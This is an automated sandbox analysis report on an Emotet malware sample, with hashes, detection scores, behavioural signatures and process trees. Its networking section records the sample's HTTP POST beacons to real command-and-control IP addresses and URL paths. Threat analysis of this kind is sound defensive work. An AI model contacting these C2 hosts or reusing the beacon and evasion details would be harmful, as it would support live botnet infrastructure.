Loading ...

Play interactive tourEdit tour

Analysis Report FsWcL0gpTv

Overview

General Information

Sample Name:FsWcL0gpTv (renamed file extension from none to exe)
Analysis ID:317598
MD5:d1cef4c90a48a4788d9ce4208ee769cb
SHA1:5c17f1665881c62c9cee7bded2df3c2ac557cd38
SHA256:eabe9e59682457968198f818f0d2d280d397a001d7fee58a2de6c9acc0d2651a

Most interesting Screenshot:

Detection

Emotet
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • FsWcL0gpTv.exe (PID: 5332 cmdline: 'C:\Users\user\Desktop\FsWcL0gpTv.exe' MD5: D1CEF4C90A48A4788D9CE4208EE769CB)
    • WpPortingLibrary.exe (PID: 5896 cmdline: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe MD5: D1CEF4C90A48A4788D9CE4208EE769CB)
  • svchost.exe (PID: 5452 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4012 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5816 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1748 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6164 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6256 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6304 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6344 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5956 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.238986600.0000000002EB4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000003.00000002.500653398.00000000029F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000000.00000002.239016780.0000000002EF1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000003.00000002.500762111.0000000002A34000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000000.00000002.238943742.0000000002E70000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.FsWcL0gpTv.exe.2ef0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              3.2.WpPortingLibrary.exe.2a70000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for submitted fileShow sources
                Source: FsWcL0gpTv.exeVirustotal: Detection: 61%Perma Link
                Source: FsWcL0gpTv.exeMetadefender: Detection: 45%Perma Link
                Source: FsWcL0gpTv.exeReversingLabs: Detection: 70%
                Source: FsWcL0gpTv.exeVirustotal: Detection: 61%Perma Link
                Source: FsWcL0gpTv.exeMetadefender: Detection: 45%Perma Link
                Source: FsWcL0gpTv.exeReversingLabs: Detection: 70%
                Machine Learning detection for sampleShow sources
                Source: FsWcL0gpTv.exeJoe Sandbox ML: detected
                Source: FsWcL0gpTv.exeJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A72290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,3_2_02A72290
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,3_2_02A72650
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A71FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash,3_2_02A71FB0
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A72290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,3_2_02A72290
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,3_2_02A72650
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A71FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash,3_2_02A71FB0
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_02EF38F0
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_02EF38F0
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,3_2_02A738F0

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49707 -> 102.182.145.130:80
                Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.5:49723 -> 173.173.254.105:80
                Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49734 -> 64.207.182.168:8080
                Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49737 -> 51.89.199.141:8080
                Source: TrafficSnort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49707 -> 102.182.145.130:80
                Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.5:49723 -> 173.173.254.105:80
                Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49734 -> 64.207.182.168:8080
                Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49737 -> 51.89.199.141:8080
                Source: global trafficTCP traffic: 192.168.2.5:49734 -> 64.207.182.168:8080
                Source: global trafficTCP traffic: 192.168.2.5:49737 -> 51.89.199.141:8080
                Source: global trafficTCP traffic: 192.168.2.5:49734 -> 64.207.182.168:8080
                Source: global trafficTCP traffic: 192.168.2.5:49737 -> 51.89.199.141:8080
                Source: Joe Sandbox ViewIP Address: 102.182.145.130 102.182.145.130
                Source: Joe Sandbox ViewIP Address: 102.182.145.130 102.182.145.130
                Source: Joe Sandbox ViewIP Address: 64.207.182.168 64.207.182.168
                Source: Joe Sandbox ViewASN Name: AfrihostZA AfrihostZA
                Source: Joe Sandbox ViewASN Name: AfrihostZA AfrihostZA
                Source: Joe Sandbox ViewASN Name: GO-DADDY-COM-LLCUS GO-DADDY-COM-LLCUS
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 102.182.145.130:80
                Source: global trafficTCP traffic: 192.168.2.5:49723 -> 173.173.254.105:80
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 102.182.145.130:80
                Source: global trafficTCP traffic: 192.168.2.5:49723 -> 173.173.254.105:80
                Source: global trafficHTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------wo3M7HGlGf1KUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4580Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------wo3M7HGlGf1KUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4580Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 102.182.145.130
                Source: unknownTCP traffic detected without corresponding DNS query: 102.182.145.130
                Source: unknownTCP traffic detected without corresponding DNS query: 102.182.145.130
                Source: unknownTCP traffic detected without corresponding DNS query: 173.173.254.105
                Source: unknownTCP traffic detected without corresponding DNS query: 173.173.254.105
                Source: unknownTCP traffic detected without corresponding DNS query: 173.173.254.105
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 102.182.145.130
                Source: unknownTCP traffic detected without corresponding DNS query: 102.182.145.130
                Source: unknownTCP traffic detected without corresponding DNS query: 102.182.145.130
                Source: unknownTCP traffic detected without corresponding DNS query: 173.173.254.105
                Source: unknownTCP traffic detected without corresponding DNS query: 173.173.254.105
                Source: unknownTCP traffic detected without corresponding DNS query: 173.173.254.105
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 64.207.182.168
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,3_2_02A729B0
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,3_2_02A729B0
                Source: unknownHTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/X-
                Source: WpPortingLibrary.exe, 00000003.00000003.361330882.000000000325E000.00000004.00000001.sdmpString found in binary or memory: http://173.173.254.105/LN19JoV6Jo34Ba/UOjzG3KqtwalQ/Gy4EZLufQaYY3rmRrq0/Su721nFGl8jnm9/v1RyG4lzB/
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/
                Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmpString found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/.
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/T)
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/d(
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://64.207.182.168:8080/hdXW/
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://64.207.182.168:8080/hdXW/O
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://64.207.182.168:8080/hdXW/l
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://64.207.182.168:8080/hdXW/ll
                Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000004.00000002.501376722.0000017996C00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000004.00000002.503056387.0000017997060000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 00000009.00000002.304660388.00000189FAC13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304362631.00000189FAC63000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000009.00000002.304715723.00000189FAC3A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/X-
                Source: WpPortingLibrary.exe, 00000003.00000003.361330882.000000000325E000.00000004.00000001.sdmpString found in binary or memory: http://173.173.254.105/LN19JoV6Jo34Ba/UOjzG3KqtwalQ/Gy4EZLufQaYY3rmRrq0/Su721nFGl8jnm9/v1RyG4lzB/
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/
                Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmpString found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/.
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/T)
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/d(
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://64.207.182.168:8080/hdXW/
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://64.207.182.168:8080/hdXW/O
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://64.207.182.168:8080/hdXW/l
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmpString found in binary or memory: http://64.207.182.168:8080/hdXW/ll
                Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000004.00000002.501376722.0000017996C00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000004.00000002.503056387.0000017997060000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 00000009.00000002.304660388.00000189FAC13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
